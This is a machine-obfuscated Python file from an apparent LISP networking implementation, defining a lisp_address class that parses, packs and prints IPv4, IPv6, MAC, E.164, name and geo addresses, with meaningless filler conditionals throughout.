if 31 - 31: IiII + iII111i
if 5 - 5: O0 * Ii1I
if 78 - 78: iII111i * iIii1I11I1II1 . OoO0O00 . OoOoOO00 % I1Ii111
if 77 - 77: OOooOOo / OoooooooOO
if 11 - 11: iIii1I11I1II1 - Ii1I - OoOoOO00 . oO0o / I1ii11iIi11i
if 79 - 79: i11iIiiIii % o0oOOo0O0Ooo * II111iiii . i1IIi * Ii1I - i11iIiiIii
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
Oooo0OOO0oo0o = O0oiiii1i1i11I . lookup_source_cache ( eid , exact )
if ( Oooo0OOO0oo0o ) : return ( Oooo0OOO0oo0o )
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
if ( exact ) :
O0oiiii1i1i11I = None
else :
II1i1i = O0oiiii1i1i11I . parent_for_more_specifics
if ( II1i1i and II1i1i . accept_more_specifics ) :
if ( group . is_more_specific ( II1i1i . group ) ) : O0oiiii1i1i11I = II1i1i
if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
if 81 - 81: I1ii11iIi11i - i11iIiiIii
return ( O0oiiii1i1i11I )
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if 48 - 48: iII111i + Ii1I
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 48 - 48: ooOoO0o + II111iiii
if 73 - 73: II111iiii
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 66 - 66: o0oOOo0O0Ooo % IiII
if 39 - 39: IiII
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 18 - 18: iII111i % o0oOOo0O0Ooo - i1IIi
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 53 - 53: o0oOOo0O0Ooo + IiII - ooOoO0o % i11iIiiIii - i11iIiiIii - I1Ii111
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 79 - 79: II111iiii + i11iIiiIii . OOooOOo . I11i / iIii1I11I1II1
if 62 - 62: O0
if 52 - 52: OoooooooOO . oO0o
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
O0o00o000oO = self . address
if ( ( ( O0o00o000oO & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( O0o00o000oO & 0xff000000 ) >> 24 ) == 172 ) :
o000O000o0O = ( O0o00o000oO & 0x00ff0000 ) >> 16
if ( o000O000o0O >= 16 and o000O000o0O <= 31 ) : return ( True )
if 62 - 62: O0 . O0 + i11iIiiIii
if ( ( ( O0o00o000oO & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 57 - 57: II111iiii . I1IiiI . OOooOOo / IiII . II111iiii
if 80 - 80: I11i * OoO0O00 + ooOoO0o % ooOoO0o
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 16 - 16: iII111i / i11iIiiIii + iIii1I11I1II1
if 76 - 76: OoooooooOO / Oo0Ooo / I1Ii111 + OoooooooOO
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 65 - 65: Oo0Ooo - I1Ii111
return ( 0 )
if 57 - 57: O0
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
O0o00o000oO = self . address >> 96
return ( O0o00o000oO == 0x20010005 )
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
return ( 0 )
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
if 38 - 38: IiII . I1Ii111
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
def packet_format ( self ) :
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
if 11 - 11: iII111i
if 60 - 60: I1ii11iIi11i / I1Ii111
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
def pack_address ( self ) :
o00OooooOOOO = self . packet_format ( )
ii1i1II = ""
if ( self . is_ipv4 ( ) ) :
ii1i1II = struct . pack ( o00OooooOOOO , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
IiiiI1 = byte_swap_64 ( self . address >> 64 )
I1IIIi = byte_swap_64 ( self . address & 0xffffffffffffffff )
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi )
elif ( self . is_mac ( ) ) :
O0o00o000oO = self . address
IiiiI1 = ( O0o00o000oO >> 32 ) & 0xffff
I1IIIi = ( O0o00o000oO >> 16 ) & 0xffff
o0Ooo0OoOo = O0o00o000oO & 0xffff
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi , o0Ooo0OoOo )
elif ( self . is_e164 ( ) ) :
O0o00o000oO = self . address
IiiiI1 = ( O0o00o000oO >> 32 ) & 0xffffffff
I1IIIi = ( O0o00o000oO & 0xffffffff )
ii1i1II = struct . pack ( o00OooooOOOO , IiiiI1 , I1IIIi )
elif ( self . is_dist_name ( ) ) :
ii1i1II += self . address + "\0"
if 71 - 71: II111iiii
return ( ii1i1II )
if 34 - 34: I1ii11iIi11i * oO0o + OoooooooOO
if 39 - 39: I1IiiI * ooOoO0o / i11iIiiIii - oO0o - oO0o + O0
def unpack_address ( self , packet ) :
o00OooooOOOO = self . packet_format ( )
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 73 - 73: OOooOOo
O0o00o000oO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( O0o00o000oO [ 0 ] )
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
elif ( self . is_ipv6 ( ) ) :
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
if 4 - 4: oO0o % OoO0O00 + IiII + o0oOOo0O0Ooo
if 82 - 82: O0 / I1Ii111 + OOooOOo . IiII + Ii1I
if 31 - 31: i1IIi * OoO0O00 - Ii1I + I11i
if 8 - 8: O0 + i1IIi . O0
if 67 - 67: I1IiiI
if 42 - 42: ooOoO0o - o0oOOo0O0Ooo % oO0o - ooOoO0o
if 87 - 87: OoooooooOO / O0
if ( O0o00o000oO [ 0 ] <= 0xffff and ( O0o00o000oO [ 0 ] & 0xff ) == 0 ) :
OoO0 = ( O0o00o000oO [ 0 ] << 48 ) << 64
else :
OoO0 = byte_swap_64 ( O0o00o000oO [ 0 ] ) << 64
if 94 - 94: oO0o + Ii1I % IiII
iI111 = byte_swap_64 ( O0o00o000oO [ 1 ] )
self . address = OoO0 | iI111
if 62 - 62: iIii1I11I1II1
elif ( self . is_mac ( ) ) :
OOoOO = O0o00o000oO [ 0 ]
OooOOoO = O0o00o000oO [ 1 ]
iii1111iII1 = O0o00o000oO [ 2 ]
self . address = ( OOoOO << 32 ) + ( OooOOoO << 16 ) + iii1111iII1
if 2 - 2: o0oOOo0O0Ooo / O0
elif ( self . is_e164 ( ) ) :
self . address = ( O0o00o000oO [ 0 ] << 32 ) + O0o00o000oO [ 1 ]
if 29 - 29: OOooOOo . OOooOOo * iII111i % OoO0O00
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
oO0o00O = 0
if 66 - 66: Ii1I / OoO0O00 * i11iIiiIii * oO0o . iIii1I11I1II1
packet = packet [ oO0o00O : : ]
return ( packet )
if 16 - 16: Oo0Ooo % IiII * o0oOOo0O0Ooo % OoOoOO00 - OoooooooOO
if 61 - 61: i11iIiiIii - i1IIi + iIii1I11I1II1 * I1IiiI % OoOoOO00 . oO0o
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 24 - 24: iII111i . i1IIi * I1ii11iIi11i
if 1 - 1: oO0o / OoOoOO00 + I1IiiI
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 47 - 47: O0 / OOooOOo . i1IIi / OoooooooOO . IiII
if 34 - 34: OoO0O00 * II111iiii + I1Ii111
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 20 - 20: iIii1I11I1II1 . OoO0O00 . II111iiii / Ii1I - iIii1I11I1II1 / OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
if 65 - 65: I1IiiI . ooOoO0o
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 60 - 60: ooOoO0o
if 47 - 47: i11iIiiIii
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
return ( False )
if 56 - 56: Ii1I . iII111i
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
if 52 - 52: i11iIiiIii
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 1 - 1: i1IIi * iIii1I11I1II1
if 29 - 29: I11i
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 12 - 12: oO0o % i1IIi - oO0o / ooOoO0o * II111iiii % ooOoO0o
if 6 - 6: IiII / OoO0O00
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 83 - 83: IiII - iIii1I11I1II1 * ooOoO0o - oO0o
if 77 - 77: Ii1I
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
i1i1IIIIIIIi = addr_str . find ( "[" )
Oo0iIIiiIiiI = addr_str . find ( "]" )
if ( i1i1IIIIIIIi != - 1 and Oo0iIIiiIiiI != - 1 ) :
self . instance_id = int ( addr_str [ i1i1IIIIIIIi + 1 : Oo0iIIiiIiiI ] )
addr_str = addr_str [ Oo0iIIiiIiiI + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
if 77 - 77: ooOoO0o + I1ii11iIi11i * o0oOOo0O0Ooo / i1IIi * I11i
if 70 - 70: oO0o / iII111i * i1IIi / II111iiii / OoOoOO00 + oO0o
if 30 - 30: i1IIi - iII111i - i11iIiiIii . OoOoOO00 . o0oOOo0O0Ooo
if 74 - 74: i11iIiiIii / II111iiii
if ( self . is_ipv4 ( ) ) :
oOo = addr_str . split ( "." )
Oooo0oOOO0 = int ( oOo [ 0 ] ) << 24
Oooo0oOOO0 += int ( oOo [ 1 ] ) << 16
Oooo0oOOO0 += int ( oOo [ 2 ] ) << 8
Oooo0oOOO0 += int ( oOo [ 3 ] )
self . address = Oooo0oOOO0
elif ( self . is_ipv6 ( ) ) :
if 45 - 45: OoOoOO00 + I1Ii111 + Oo0Ooo
if 73 - 73: OoO0O00 / o0oOOo0O0Ooo % Ii1I * ooOoO0o
if 94 - 94: I1IiiI . iII111i - iIii1I11I1II1 . Oo0Ooo
if 40 - 40: Ii1I
if 26 - 26: OoO0O00 / IiII
if 31 - 31: Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
i11IIIi = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 57 - 57: OoOoOO00 . iII111i
addr_str = binascii . hexlify ( addr_str )
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if ( i11IIIi ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 34 - 34: iII111i . OoOoOO00
self . address = int ( addr_str , 16 )
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
elif ( self . is_geo_prefix ( ) ) :
OOoooo = lisp_geo ( None )
OOoooo . name = "geo-prefix-{}" . format ( OOoooo )
OOoooo . parse_geo_string ( addr_str )
self . address = OOoooo
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
Oooo0oOOO0 = int ( addr_str , 16 )
self . address = Oooo0oOOO0
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
Oooo0oOOO0 = int ( addr_str , 16 )
self . address = Oooo0oOOO0 << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
self . mask_len = self . host_mask_len ( )
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
OO000o00 = prefix_str . find ( "]" )
Ooo0o00 = len ( prefix_str [ OO000o00 + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , Ooo0o00 = prefix_str . split ( "/" )
else :
IIIIIiII1 = prefix_str . find ( "'" )
if ( IIIIIiII1 == - 1 ) : return
iiiiI1iiiIi = prefix_str . find ( "'" , IIIIIiII1 + 1 )
if ( iiiiI1iiiIi == - 1 ) : return
Ooo0o00 = len ( prefix_str [ IIIIIiII1 + 1 : iiiiI1iiiIi ] ) * 8
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( Ooo0o00 )
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
if 34 - 34: OoooooooOO / iII111i / O0
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
O0OO0O000o = ( 2 ** self . mask_len ) - 1
oOo00o0o = self . addr_length ( ) * 8 - self . mask_len
O0OO0O000o <<= oOo00o0o
self . address &= O0OO0O000o
if 25 - 25: Ii1I % i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
def is_geo_string ( self , addr_str ) :
OO000o00 = addr_str . find ( "]" )
if ( OO000o00 != - 1 ) : addr_str = addr_str [ OO000o00 + 1 : : ]
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
OOoooo = addr_str . split ( "/" )
if ( len ( OOoooo ) == 2 ) :
if ( OOoooo [ 1 ] . isdigit ( ) == False ) : return ( False )
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
OOoooo = OOoooo [ 0 ]
OOoooo = OOoooo . split ( "-" )
o0OoOOoO0o0 = len ( OOoooo )
if ( o0OoOOoO0o0 < 8 or o0OoOOoO0o0 > 9 ) : return ( False )
if 48 - 48: O0 - I1ii11iIi11i * ooOoO0o - iII111i - Ii1I - I1Ii111
for iioo0O0o0oo0O in range ( 0 , o0OoOOoO0o0 ) :
if ( iioo0O0o0oo0O == 3 ) :
if ( OOoooo [ iioo0O0o0oo0O ] in [ "N" , "S" ] ) : continue
return ( False )
if 4 - 4: Ii1I + ooOoO0o * i11iIiiIii + iII111i
if ( iioo0O0o0oo0O == 7 ) :
if ( OOoooo [ iioo0O0o0oo0O ] in [ "W" , "E" ] ) : continue
return ( False )
if 77 - 77: OoO0O00 . iII111i
if ( OOoooo [ iioo0O0o0oo0O ] . isdigit ( ) == False ) : return ( False )
if 77 - 77: I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
return ( True )
if 17 - 17: OoooooooOO - i1IIi * I11i
if 33 - 33: i1IIi . Oo0Ooo + I11i
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 78 - 78: I1Ii111 + I1Ii111
if 43 - 43: I1Ii111 * o0oOOo0O0Ooo + i1IIi
def print_address ( self ) :
O0o00o000oO = self . print_address_no_iid ( )
oOo00Ooo0o0 = "[" + str ( self . instance_id )
for i1i1IIIIIIIi in self . iid_list : oOo00Ooo0o0 += "," + str ( i1i1IIIIIIIi )
oOo00Ooo0o0 += "]"
O0o00o000oO = "{}{}" . format ( oOo00Ooo0o0 , O0o00o000oO )
return ( O0o00o000oO )
if 19 - 19: Ii1I
if 51 - 51: oO0o
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
O0o00o000oO = self . address
OoOO00OO = O0o00o000oO >> 24
IIii1iiI = ( O0o00o000oO >> 16 ) & 0xff
II1 = ( O0o00o000oO >> 8 ) & 0xff
ooO0oo = O0o00o000oO & 0xff
return ( "{}.{}.{}.{}" . format ( OoOO00OO , IIii1iiI , II1 , ooO0oo ) )
elif ( self . is_ipv6 ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 32 )
oOo0O = binascii . unhexlify ( oOo0O )
oOo0O = socket . inet_ntop ( socket . AF_INET6 , oOo0O )
return ( "{}" . format ( oOo0O ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 12 )
oOo0O = "{}-{}-{}" . format ( oOo0O [ 0 : 4 ] , oOo0O [ 4 : 8 ] ,
oOo0O [ 8 : 12 ] )
return ( "{}" . format ( oOo0O ) )
elif ( self . is_e164 ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oOo0O ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 56 - 56: II111iiii + II111iiii - I1ii11iIi11i
return ( "unknown-afi:{}" . format ( self . afi ) )
if 48 - 48: I1Ii111 / I1ii11iIi11i % OOooOOo
if 8 - 8: O0 . IiII - ooOoO0o * OoOoOO00 / OoO0O00 - O0
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
I1I1i11i1I1 = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , I1I1i11i1I1 ) )
if 48 - 48: iIii1I11I1II1 + i1IIi . I1IiiI % OoO0O00 - iIii1I11I1II1 / i1IIi
O0o00o000oO = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( O0o00o000oO )
if ( self . is_geo_prefix ( ) ) : return ( O0o00o000oO )
if 14 - 14: IiII . I11i
OO000o00 = O0o00o000oO . find ( "no-address" )
if ( OO000o00 == - 1 ) :
O0o00o000oO = "{}/{}" . format ( O0o00o000oO , str ( self . mask_len ) )
else :
O0o00o000oO = O0o00o000oO [ 0 : OO000o00 ]
if 13 - 13: OoOoOO00 - I11i . OOooOOo % OoO0O00
return ( O0o00o000oO )
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
